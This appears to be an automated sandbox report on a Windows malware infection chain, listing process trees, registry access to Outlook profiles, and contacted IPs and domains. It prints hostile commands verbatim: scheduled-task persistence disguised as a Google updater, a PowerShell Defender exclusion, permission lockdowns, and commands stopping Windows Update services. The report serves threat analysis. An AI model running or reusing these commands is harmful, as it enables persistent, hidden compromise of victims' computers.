PID 1076 wrote to memory of 2516 N/A C:\Users\Admin\Pictures\Minor Policy\_Axw7GGd2Fy7GTHeEDtFtPCq.exe C:\Users\Admin\Pictures\Minor Policy\_Axw7GGd2Fy7GTHeEDtFtPCq.exe
PID 1076 wrote to memory of 2516 N/A C:\Users\Admin\Pictures\Minor Policy\_Axw7GGd2Fy7GTHeEDtFtPCq.exe C:\Users\Admin\Pictures\Minor Policy\_Axw7GGd2Fy7GTHeEDtFtPCq.exe
PID 1076 wrote to memory of 2516 N/A C:\Users\Admin\Pictures\Minor Policy\_Axw7GGd2Fy7GTHeEDtFtPCq.exe C:\Users\Admin\Pictures\Minor Policy\_Axw7GGd2Fy7GTHeEDtFtPCq.exe
PID 1076 wrote to memory of 2516 N/A C:\Users\Admin\Pictures\Minor Policy\_Axw7GGd2Fy7GTHeEDtFtPCq.exe C:\Users\Admin\Pictures\Minor Policy\_Axw7GGd2Fy7GTHeEDtFtPCq.exe
PID 1076 wrote to memory of 2516 N/A C:\Users\Admin\Pictures\Minor Policy\_Axw7GGd2Fy7GTHeEDtFtPCq.exe C:\Users\Admin\Pictures\Minor Policy\_Axw7GGd2Fy7GTHeEDtFtPCq.exe
PID 1076 wrote to memory of 2516 N/A C:\Users\Admin\Pictures\Minor Policy\_Axw7GGd2Fy7GTHeEDtFtPCq.exe C:\Users\Admin\Pictures\Minor Policy\_Axw7GGd2Fy7GTHeEDtFtPCq.exe
PID 544 wrote to memory of 2668 N/A C:\Users\Admin\Pictures\Minor Policy\r0AmxgPgCNAvJP2wBzVyrn8O.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Px7dg92.exe
PID 544 wrote to memory of 2668 N/A C:\Users\Admin\Pictures\Minor Policy\r0AmxgPgCNAvJP2wBzVyrn8O.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Px7dg92.exe
PID 544 wrote to memory of 2668 N/A C:\Users\Admin\Pictures\Minor Policy\r0AmxgPgCNAvJP2wBzVyrn8O.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Px7dg92.exe
PID 544 wrote to memory of 2668 N/A C:\Users\Admin\Pictures\Minor Policy\r0AmxgPgCNAvJP2wBzVyrn8O.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Px7dg92.exe

Uses Task Scheduler COM API

persistence

outlook_office_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\Pictures\Minor Policy\qDJxOF88P5b31X9nYbNzcZPp.exe N/A

outlook_win_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\Pictures\Minor Policy\qDJxOF88P5b31X9nYbNzcZPp.exe N/A

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\Setup.exe

"C:\Users\Admin\AppData\Local\Temp\Setup.exe"

C:\Users\Admin\Pictures\Minor Policy\r0AmxgPgCNAvJP2wBzVyrn8O.exe

"C:\Users\Admin\Pictures\Minor Policy\r0AmxgPgCNAvJP2wBzVyrn8O.exe"

C:\Users\Admin\Pictures\Minor Policy\ch5c8B5ZdA4rJTdsnDNjoJVN.exe

"C:\Users\Admin\Pictures\Minor Policy\ch5c8B5ZdA4rJTdsnDNjoJVN.exe"

C:\Users\Admin\Pictures\Minor Policy\p0Md4MBiYJc6SgyciNphhNUh.exe

"C:\Users\Admin\Pictures\Minor Policy\p0Md4MBiYJc6SgyciNphhNUh.exe"

C:\Users\Admin\Pictures\Minor Policy\RxOQCm7grqMZ61Vr_46oGvts.exe

"C:\Users\Admin\Pictures\Minor Policy\RxOQCm7grqMZ61Vr_46oGvts.exe"

C:\Users\Admin\Pictures\Minor Policy\_Axw7GGd2Fy7GTHeEDtFtPCq.exe

"C:\Users\Admin\Pictures\Minor Policy\_Axw7GGd2Fy7GTHeEDtFtPCq.exe"

C:\Users\Admin\Pictures\Minor Policy\ZW9r6_Jcut69xZ7q3DByCddi.exe

"C:\Users\Admin\Pictures\Minor Policy\ZW9r6_Jcut69xZ7q3DByCddi.exe"

C:\Users\Admin\Pictures\Minor Policy\qDJxOF88P5b31X9nYbNzcZPp.exe

"C:\Users\Admin\Pictures\Minor Policy\qDJxOF88P5b31X9nYbNzcZPp.exe"

C:\Users\Admin\Pictures\Minor Policy\8of3DRmQjWCjBhE2NNvN6ur1.exe

"C:\Users\Admin\Pictures\Minor Policy\8of3DRmQjWCjBhE2NNvN6ur1.exe"

C:\Users\Admin\Pictures\Minor Policy\dmLR0Y_m8IWj4ctFaNTqCtNr.exe

"C:\Users\Admin\Pictures\Minor Policy\dmLR0Y_m8IWj4ctFaNTqCtNr.exe"

C:\Users\Admin\Pictures\Minor Policy\a8aMLCY7UqQ6j_EBBntQ5onH.exe

"C:\Users\Admin\Pictures\Minor Policy\a8aMLCY7UqQ6j_EBBntQ5onH.exe"

C:\Users\Admin\Pictures\Minor Policy\S3G8zb34YK75eg8vIvwnsVI2.exe

"C:\Users\Admin\Pictures\Minor Policy\S3G8zb34YK75eg8vIvwnsVI2.exe"

C:\Users\Admin\Pictures\Minor Policy\_Axw7GGd2Fy7GTHeEDtFtPCq.exe

"C:\Users\Admin\Pictures\Minor Policy\_Axw7GGd2Fy7GTHeEDtFtPCq.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Px7dg92.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Px7dg92.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Kh9Eh27.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Kh9Eh27.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\cu2Lz27.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\cu2Lz27.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\xt8uk02.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\xt8uk02.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1FG56KM1.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1FG56KM1.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /f /RU "Admin" /tr "C:\ProgramData\WinTrackerSP\WinTrackerSP.exe" /tn "WinTrackerSP HR" /sc HOURLY /rl HIGHEST

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Users\Admin\AppData\Local\6a32e694-ce15-4166-b5d5-39601b8b4741" /deny *S-1-1-0:(OI)(CI)(DE,DC)

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /f /RU "Admin" /tr "C:\ProgramData\WinTrackerSP\WinTrackerSP.exe" /tn "WinTrackerSP LG" /sc ONLOGON /rl HIGHEST

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2lv8023.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2lv8023.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef64d9758,0x7fef64d9768,0x7fef64d9778

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\3Gh68ms.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\3Gh68ms.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\4nE240CO.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\4nE240CO.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1620 -s 268

C:\Users\Admin\Pictures\Minor Policy\J09p8V_CfJYAsxckvyLwXWHH.exe

"C:\Users\Admin\Pictures\Minor Policy\J09p8V_CfJYAsxckvyLwXWHH.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\5Cy9OS5.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\5Cy9OS5.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\6Vw8Dv1.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\6Vw8Dv1.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2752 -s 268

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef71e9758,0x7fef71e9768,0x7fef71e9778

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef71e9758,0x7fef71e9768,0x7fef71e9778

C:\Users\Admin\Pictures\Minor Policy\05i4TLYHZEFYjn7jxbwobpPC.exe

"C:\Users\Admin\Pictures\Minor Policy\05i4TLYHZEFYjn7jxbwobpPC.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xbc,0xc0,0xc4,0x90,0xc8,0x7fef71e9758,0x7fef71e9768,0x7fef71e9778

C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe

"C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe"

C:\Users\Admin\Pictures\Minor Policy\_Axw7GGd2Fy7GTHeEDtFtPCq.exe

"C:\Users\Admin\Pictures\Minor Policy\_Axw7GGd2Fy7GTHeEDtFtPCq.exe" --Admin IsNotAutoStart IsNotTask

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\BAA8.tmp\C469.tmp\C46A.bat C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\6Vw8Dv1.exe"

C:\Users\Admin\Pictures\Minor Policy\_Axw7GGd2Fy7GTHeEDtFtPCq.exe

"C:\Users\Admin\Pictures\Minor Policy\_Axw7GGd2Fy7GTHeEDtFtPCq.exe" --Admin IsNotAutoStart IsNotTask

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe" /F

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "oneetx.exe" /P "Admin:N"&&CACLS "oneetx.exe" /P "Admin:R" /E&&echo Y|CACLS "..\207aa4515d" /P "Admin:N"&&CACLS "..\207aa4515d" /P "Admin:R" /E&&Exit

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" https://www.facebook.com/login

C:\Windows\SysWOW64\cacls.exe

CACLS "oneetx.exe" /P "Admin:N"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "oneetx.exe" /P "Admin:R" /E

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\207aa4515d" /P "Admin:N"

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" https://www.youtube.com/

C:\Windows\SysWOW64\cacls.exe

CACLS "..\207aa4515d" /P "Admin:R" /E

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" https://accounts.google.com/

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1940 CREDAT:340993 /prefetch:2

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2396 CREDAT:275457 /prefetch:2

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2636 CREDAT:275457 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1564 --field-trial-handle=1544,i,6952577532179320664,14724362541559117473,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1344 --field-trial-handle=1544,i,6952577532179320664,14724362541559117473,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1216 --field-trial-handle=1544,i,6952577532179320664,14724362541559117473,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1380 --field-trial-handle=1304,i,3376028010438598253,6082975748191350444,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1172 --field-trial-handle=1304,i,3376028010438598253,6082975748191350444,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1392 --field-trial-handle=1324,i,6085867165921108108,2268449169252094913,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1216 --field-trial-handle=1324,i,6085867165921108108,2268449169252094913,131072 /prefetch:2

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2152 --field-trial-handle=1544,i,6952577532179320664,14724362541559117473,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2164 --field-trial-handle=1544,i,6952577532179320664,14724362541559117473,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"

C:\Users\Admin\AppData\Local\Temp\1000356001\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\1000356001\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\1000356001\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\1000356001\toolspub2.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x12c,0x130,0x134,0x100,0x138,0x7fef64d9758,0x7fef64d9768,0x7fef64d9778

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Users\Admin\AppData\Local\Temp\1000357001\e0cbefcb1af40c7d4aff4aca26621a98.exe

"C:\Users\Admin\AppData\Local\Temp\1000357001\e0cbefcb1af40c7d4aff4aca26621a98.exe"

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1112 --field-trial-handle=1276,i,12268181623787709422,12722034785618796058,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1596 --field-trial-handle=1276,i,12268181623787709422,12722034785618796058,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1520 --field-trial-handle=1276,i,12268181623787709422,12722034785618796058,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2180 --field-trial-handle=1276,i,12268181623787709422,12722034785618796058,131072 /prefetch:1

C:\Windows\System32\dialer.exe

C:\Windows\System32\dialer.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#kfbfjf#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Users\Admin\AppData\Local\Temp\C8F.exe

C:\Users\Admin\AppData\Local\Temp\C8F.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2192 --field-trial-handle=1276,i,12268181623787709422,12722034785618796058,131072 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\9C7F.exe

C:\Users\Admin\AppData\Local\Temp\9C7F.exe

C:\Windows\system32\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\AF83.bat" "

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\LZ2mp1sb.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\LZ2mp1sb.exe

C:\Users\Admin\AppData\Local\Temp\1000358001\latestX.exe

"C:\Users\Admin\AppData\Local\Temp\1000358001\latestX.exe"

C:\Users\Admin\AppData\Local\Temp\BEFF.exe

C:\Users\Admin\AppData\Local\Temp\BEFF.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Users\Admin\AppData\Local\Temp\12D.exe

C:\Users\Admin\AppData\Local\Temp\12D.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Vb8xx3DB.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Vb8xx3DB.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1596 -s 196

Network

Country Destination Domain Proto
US 208.67.104.60:80 208.67.104.60 tcp
NL 94.142.138.113:80 94.142.138.113 tcp
US 8.8.8.8:53 api.myip.com udp
US 172.67.75.163:443 api.myip.com tcp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.59.81:443 ipinfo.io tcp
US 34.117.59.81:443 ipinfo.io tcp
NL 94.142.138.113:80 94.142.138.113 tcp
US 8.8.8.8:53 vk.com udp
RU 87.240.132.72:80 vk.com tcp
RU 87.240.132.72:80 vk.com tcp
RU 87.240.132.72:80 vk.com tcp
RU 87.240.132.72:80 vk.com tcp
RU 87.240.132.72:443 vk.com tcp
NL 94.142.138.113:80 94.142.138.113 tcp
RU 87.240.132.72:80 vk.com tcp
RU 87.240.132.72:80 vk.com tcp
US 8.8.8.8:53 onualituyrs.org udp
US 8.8.8.8:53 jackantonio.top udp
BG 171.22.28.226:80 171.22.28.226 tcp
NL 185.225.74.144:80 185.225.74.144 tcp
FI 77.91.68.249:80 77.91.68.249 tcp
NL 194.169.175.232:80 194.169.175.232 tcp
RU 91.215.85.209:80 onualituyrs.org tcp
DE 45.132.1.20:80 jackantonio.top tcp
DE 45.132.1.20:80 jackantonio.top tcp
NL 185.225.74.144:80 185.225.74.144 tcp
RU 87.240.132.72:80 vk.com tcp
RU 87.240.132.72:80 vk.com tcp
RU 91.215.85.209:443 onualituyrs.org tcp
RU 87.240.132.72:80 vk.com tcp
RU 87.240.132.72:80 vk.com tcp
RU 87.240.132.72:80 vk.com tcp
RU 87.240.132.72:80 vk.com tcp
RU 87.240.132.72:80 vk.com tcp
RU 87.240.132.72:443 vk.com tcp
RU 87.240.132.72:443 vk.com tcp
RU 87.240.132.72:443 vk.com tcp
US 8.8.8.8:53 sun9-17.userapi.com udp
RU 93.186.227.128:443 sun9-17.userapi.com tcp
RU 87.240.132.72:443 vk.com tcp
US 8.8.8.8:53 sun9-66.userapi.com udp
RU 87.240.185.165:443 sun9-66.userapi.com tcp
RU 87.240.132.72:443 vk.com tcp
US 8.8.8.8:53 sun9-77.userapi.com udp
RU 87.240.169.0:443 sun9-77.userapi.com tcp
RU 87.240.132.72:443 vk.com tcp
US 8.8.8.8:53 sun9-10.userapi.com udp
RU 87.240.185.137:443 sun9-10.userapi.com tcp
RU 87.240.132.72:80 vk.com tcp
US 8.8.8.8:53 sun9-1.userapi.com udp
RU 87.240.185.128:443 sun9-1.userapi.com tcp
RU 87.240.132.72:80 vk.com tcp
RU 87.240.132.72:80 vk.com tcp
RU 87.240.132.72:443 vk.com tcp
RU 87.240.132.72:80 vk.com tcp
RU 87.240.132.72:80 vk.com tcp
RU 87.240.132.72:80 vk.com tcp
